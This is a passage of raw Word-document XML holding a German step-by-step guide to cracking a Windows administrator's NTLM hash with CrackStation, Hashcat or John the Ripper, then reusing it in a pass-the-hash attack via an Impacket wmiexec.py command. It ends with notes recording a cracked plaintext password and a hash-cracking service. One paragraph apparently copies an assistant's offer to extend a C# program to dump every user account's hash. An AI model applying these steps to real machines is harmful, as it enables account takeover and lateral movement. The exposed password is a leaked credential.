          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D52CC87" w14:textId="77777777" w:rsidR="00304D7D" w:rsidRPr="00304D7D" w:rsidRDefault="00304D7D" w:rsidP="00304D7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Öffnen Sie auf einem Gerät mit Internetzugang die Webseite </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00304D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>CrackStation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00304D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7D43D7" w14:textId="77777777" w:rsidR="00304D7D" w:rsidRPr="00304D7D" w:rsidRDefault="00304D7D" w:rsidP="00304D7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Kopieren Sie die Hex-Kette </w:t>
      </w:r>
      <w:r w:rsidRPr="00304D7D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>02267b7322921accd5d4e9c029e80cd8</w:t>
      </w:r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 in das Eingabefeld.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA05F0D" w14:textId="77777777" w:rsidR="00304D7D" w:rsidRPr="00304D7D" w:rsidRDefault="00304D7D" w:rsidP="00304D7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Lösen Sie das Captcha und klicken Sie auf </w:t>
      </w:r>
      <w:r w:rsidRPr="00304D7D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"Crack Hashes"</w:t>
      </w:r>
      <w:r w:rsidRPr="00304D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6B6EA9" w14:textId="77777777" w:rsidR="00304D7D" w:rsidRPr="00304D7D" w:rsidRDefault="00304D7D" w:rsidP="00304D7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Die Seite gleicht den Wert ab und zeigt Ihnen in der Spalte </w:t>
      </w:r>
      <w:r w:rsidRPr="00304D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00304D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>Result</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00304D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r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 sofort das </w:t>
      </w:r>
      <w:r w:rsidRPr="00304D7D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Klartext-Passwort</w:t>
      </w:r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 an, das der Administrator verwendet hat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47810377" w14:textId="77777777" w:rsidR="00304D7D" w:rsidRPr="00304D7D" w:rsidRDefault="00304D7D" w:rsidP="00304D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304D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">(Falls Ihre Übungsumgebung komplett offline ist, nutzt man für diesen Schritt stattdessen lokale Tools wie </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00304D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>Hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00304D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> oder </w:t>
      </w:r>
      <w:r w:rsidRPr="00304D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">John </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00304D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00304D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ripper</w:t>
      </w:r>
      <w:r w:rsidRPr="00304D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> zusammen mit einer Passwortliste wie </w:t>
      </w:r>
      <w:r w:rsidRPr="00304D7D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>rockyou.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00304D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22612158" w14:textId="0FBE55CE" w:rsidR="00304D7D" w:rsidRPr="00725B05" w:rsidRDefault="008A5288" w:rsidP="00304D7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D1D30A5">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00304D7D" w:rsidRPr="00304D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>Weg 2: Den Hash direkt nutzen (Pass-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00304D7D" w:rsidRPr="00304D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00304D7D" w:rsidRPr="00304D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>-Hash)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0348F5CE" w14:textId="77777777" w:rsidR="00304D7D" w:rsidRPr="00304D7D" w:rsidRDefault="00304D7D" w:rsidP="00304D7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304D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">In einer echten IT-Forensik- oder </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00304D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>Pentesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00304D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>-Situation müssen Sie das Passwort oft gar nicht in Klartext umrechnen. Da Windows den Hash intern als Identitätsnachweis akzeptiert, können Sie sich mit dem Hash direkt am System authentifizieren. [</w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00304D7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de-DE"/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:hyperlink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hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00304D7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de-DE"/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00304D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210A823B" w14:textId="77777777" w:rsidR="00304D7D" w:rsidRPr="00304D7D" w:rsidRDefault="00304D7D" w:rsidP="00304D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Wenn Sie sich im gleichen Netzwerk befinden, können Sie aus Ihrer administrativen CMD heraus ein Tool des Microsoft </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00304D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>Sysinternals</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 Frameworks oder das Python-Toolkit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00304D7D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Impacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 nutzen, um eine neue Eingabeaufforderung direkt als dieser Administrator zu öffnen: [</w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00304D7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de-DE"/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00304D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B32D339" w14:textId="77777777" w:rsidR="00304D7D" w:rsidRPr="00304D7D" w:rsidRDefault="00304D7D" w:rsidP="00304D7D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de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00304D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="57DE0E9E" w14:textId="77777777" w:rsidR="00304D7D" w:rsidRPr="00304D7D" w:rsidRDefault="00304D7D" w:rsidP="0030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304D7D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# Beispiel mit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00304D7D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>Impacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00304D7D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(vom Linux-Host aus)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE3A63A" w14:textId="77777777" w:rsidR="00304D7D" w:rsidRPr="00304D7D" w:rsidRDefault="00304D7D" w:rsidP="0030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304D7D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>wmiexec.py -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00304D7D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>hashes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00304D7D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:02267b7322921accd5d4e9c029e80cd8 Administrator@&lt;Ziel-IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446CEF50" w14:textId="77777777" w:rsidR="00304D7D" w:rsidRPr="00304D7D" w:rsidRDefault="00304D7D" w:rsidP="00304D7D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de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00304D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>Verwende Code mit Vorsicht.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2225ADCD" w14:textId="573E63AF" w:rsidR="00304D7D" w:rsidRDefault="00304D7D" w:rsidP="00304D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Möchten Sie wissen, wie Sie Ihr C#-Programm so anpassen, dass es </w:t>
      </w:r>
      <w:r w:rsidRPr="00304D7D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automatisch alle anderen registrierten Benutzerkonten</w:t>
      </w:r>
      <w:r w:rsidRPr="00304D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> (wie z. B. lokale Standardnutzer) auf einmal ausliest, oder wollen Sie sehen, wie Sie den </w:t>
      </w:r>
      <w:r w:rsidRPr="00304D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">Hash mit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00304D7D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Hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00304D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> lokal auf Ihrem Rechner cracken</w:t>
      </w:r>
      <w:r w:rsidRPr="00304D7D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F83259E" w14:textId="3546C73C" w:rsidR="00826393" w:rsidRDefault="00826393" w:rsidP="00304D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14:paraId="77562268" w14:textId="1EFCDCCC" w:rsidR="00826393" w:rsidRDefault="008A5288" w:rsidP="00304D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t xml:space="preserve">3.  </w:t>
      </w:r>
      <w:r w:rsidR="00826393">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>NTLM Hash Cracken kann bis 72 Stunden Dauern</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> (onlinehashcrack.com)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD1D842" w14:textId="77777777" w:rsidR="00826393" w:rsidRPr="00304D7D" w:rsidRDefault="00826393" w:rsidP="00304D7D">
      <w:pPr>
        <w:spacing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14:paraId="19A60C06" w14:textId="6CCC6F62" w:rsidR="002722F0" w:rsidRDefault="00725B05">
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="0024581B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://app.onlinehashcrack.com/tasks.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="60A208F0" w14:textId="58640687" w:rsidR="00725B05" w:rsidRDefault="00725B05">
      <w:r>
        <w:t>George79!!!</w:t>
      </w:r>
      <w:r w:rsidR="004A1C22">
        <w:t xml:space="preserve"> NTLM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004A1C22">
        <w:t>Hashalgorithm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:sectPr w:rsidR="00725B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26979"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4368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FA3984"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A87071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F0"/>
    <w:rsid w:val="002722F0"/>
    <w:rsid w:val="00304D7D"/>
    <w:rsid w:val="004079D7"/>
    <w:rsid w:val="004A1C22"/>
    <w:rsid w:val="00725B05"/>
    <w:rsid w:val="00826393"/>
    <w:rsid w:val="008A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43862"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C1F47E65-7448-4D89-A084-976C629AD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304D7D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304D7D"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00304D7D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Standard"/>
    <w:rsid w:val="00304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t286pc">
    <w:name w:val="t286pc"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:rsid w:val="00304D7D"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hervorhebung">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00304D7D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04D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04D7D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undefined">
    <w:name w:val="undefined"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:rsid w:val="00304D7D"/>
  </w:style>
  <w:style w:type="character" w:styleId="NichtaufgelsteErwhnung">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="Absatz-Standardschriftart"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00725B05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8A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1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008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00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45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37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73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57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477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44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06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0" w:color="2C2E35"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="891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6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74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82934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0" w:color="2C2E35"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="44492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345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nter2.gitbook.io/darthsidious/getting-started/intro-to-windows-hashes" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://app.onlinehashcrack.com/tasks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owdstrike.com/en-us/cybersecurity-101/identity-protection/windows-ntlm/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@w0lfstrong/ntlm-authentication-explained-how-it-works-why-its-weak-and-how-attackers-exploit-it-98ad0dd904d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kamlesh140501/nt-hashes-explained-a-hackers-guide-to-understanding-and-cracking-ntlm-hashes-8d34328f55c4" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sentinelone.com/cybersecurity-101/identity-security/windows-ntlm/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.tarlogic.com/cybersecurity-glossary/ntlm-hash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vaadata.com/en/blog/what-is-pass-the-hash-attacks-types-and-security-best-practic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w0lfstrong/ntlm-authentication-explained-how-it-works-why-its-weak-and-how-attackers-exploit-it-98ad0dd904d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1323</Words>
  <Characters>8341</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>69</Lines>
  <Paragraphs>19</Paragraphs>
  <ScaleCrop>false</ScaleCrop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RMW PC 2 ueb</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>RMW PC 2 ueb</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-06-08T09:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-08T09:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>